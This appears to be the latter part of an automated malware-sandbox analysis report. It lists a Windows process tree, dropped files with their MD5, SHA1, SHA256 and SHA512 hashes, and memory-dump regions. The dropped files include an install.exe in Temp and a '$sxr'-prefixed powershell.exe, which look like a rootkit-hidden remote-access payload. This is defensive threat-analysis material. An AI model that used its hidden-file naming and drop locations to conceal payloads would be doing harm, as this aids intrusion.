                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                                          1⤵
                                                                                                            PID:5096
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff8390dceb8,0x7ff8390dcec4,0x7ff8390dced0
                                                                                                              2⤵
                                                                                                                PID:4000
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:3
                                                                                                                2⤵
                                                                                                                  PID:4756
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3756,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1864
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4240,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:4536
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                    1⤵
                                                                                                                      PID:4152
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:1912
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4676
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:5024
                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:2280
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                              1⤵
                                                                                                                                PID:4024
                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                1⤵
                                                                                                                                  PID:5108
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4564

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                    Filesize

                                                                                                                                    37KB

                                                                                                                                    MD5

                                                                                                                                    ce1c353b06a89a0b944ee54c46eabed8

                                                                                                                                    SHA1

                                                                                                                                    a85859f74de16c70ece6a69c3bc192eccb8a9129

                                                                                                                                    SHA256

                                                                                                                                    cc6b67c1f4e14893babd3969d4570244f0a467bed067c74ee59b6d5cb7f3fd1f

                                                                                                                                    SHA512

                                                                                                                                    44b7b8f24a8f756f9f69260843c1d817f3104e2a3be9e4c576b326632fdb5a72f9b47275f087cf4f75201a317181c62ee72acde1158fb59498f56406327ced01

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                                    Filesize

                                                                                                                                    162KB

                                                                                                                                    MD5

                                                                                                                                    152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                    SHA1

                                                                                                                                    c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                    SHA256

                                                                                                                                    a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                    SHA512

                                                                                                                                    2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                                                    Filesize

                                                                                                                                    409KB

                                                                                                                                    MD5

                                                                                                                                    7417c8c73e614f293152575f46134216

                                                                                                                                    SHA1

                                                                                                                                    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                                                    SHA256

                                                                                                                                    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                                                    SHA512

                                                                                                                                    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                                                  • C:\Windows\Temp\__PSScriptPolicyTest_jq4drdzz.mhr.ps1
                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                    SHA1

                                                                                                                                    445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                    SHA256

                                                                                                                                    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                    SHA512

                                                                                                                                    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Filesize

                                                                                                                                    1KB

                                                                                                                                    MD5

                                                                                                                                    aa187cac09f051e24146ad549a0f08a6

                                                                                                                                    SHA1

                                                                                                                                    2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                                    SHA256

                                                                                                                                    7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                                    SHA512

                                                                                                                                    960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                                  • memory/504-107-0x000001ED81AC0000-0x000001ED81AEB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/604-70-0x00007FF821030000-0x00007FF821040000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/604-69-0x0000022D7BAA0000-0x0000022D7BACB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/604-63-0x0000022D7BAA0000-0x0000022D7BACB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/604-62-0x0000022D7BAA0000-0x0000022D7BACB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/604-61-0x0000022D7BA70000-0x0000022D7BA95000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    148KB

                                                                                                                                  • memory/668-80-0x000002270FD80000-0x000002270FDAB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/668-81-0x00007FF821030000-0x00007FF821040000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/668-74-0x000002270FD80000-0x000002270FDAB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/944-85-0x00000205F74D0000-0x00000205F74FB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/944-92-0x00007FF821030000-0x00007FF821040000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/944-91-0x00000205F74D0000-0x00000205F74FB000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/992-49-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/992-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/992-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/992-48-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/992-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/992-56-0x00007FF860FB0000-0x00007FF8611A5000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                  • memory/992-57-0x00007FF860B50000-0x00007FF860C0E000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    760KB

                                                                                                                                  • memory/992-58-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/1016-96-0x000001E38EDF0000-0x000001E38EE1B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1016-102-0x000001E38EDF0000-0x000001E38EE1B000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    172KB

                                                                                                                                  • memory/1016-103-0x00007FF821030000-0x00007FF821040000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/2528-14-0x0000000075230000-0x00000000759E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/2528-35-0x00000000067B0000-0x00000000067BA000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/2528-1345-0x0000000075230000-0x00000000759E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/2528-13-0x0000000075230000-0x00000000759E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/3776-47-0x00007FF860B50000-0x00007FF860C0E000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    760KB

                                                                                                                                  • memory/3776-46-0x00007FF860FB0000-0x00007FF8611A5000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    2.0MB

                                                                                                                                  • memory/3776-45-0x000001A6FAC70000-0x000001A6FAC9A000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    168KB

                                                                                                                                  • memory/3776-21-0x000001A6F83D0000-0x000001A6F83F2000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                  • memory/5028-7-0x0000000006A40000-0x0000000006A7C000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    240KB

                                                                                                                                  • memory/5028-4-0x0000000075230000-0x00000000759E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/5028-0-0x000000007523E000-0x000000007523F000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/5028-5-0x0000000005700000-0x0000000005766000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                  • memory/5028-6-0x0000000006500000-0x0000000006512000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                  • memory/5028-3-0x0000000005810000-0x00000000058A2000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    584KB

                                                                                                                                  • memory/5028-2-0x0000000005CB0000-0x0000000006254000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    5.6MB

                                                                                                                                  • memory/5028-20-0x0000000075230000-0x00000000759E0000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/5028-1-0x0000000000C80000-0x0000000000CEC000-memory.dmp
                                                                                                                                    Filesize

                                                                                                                                    432KB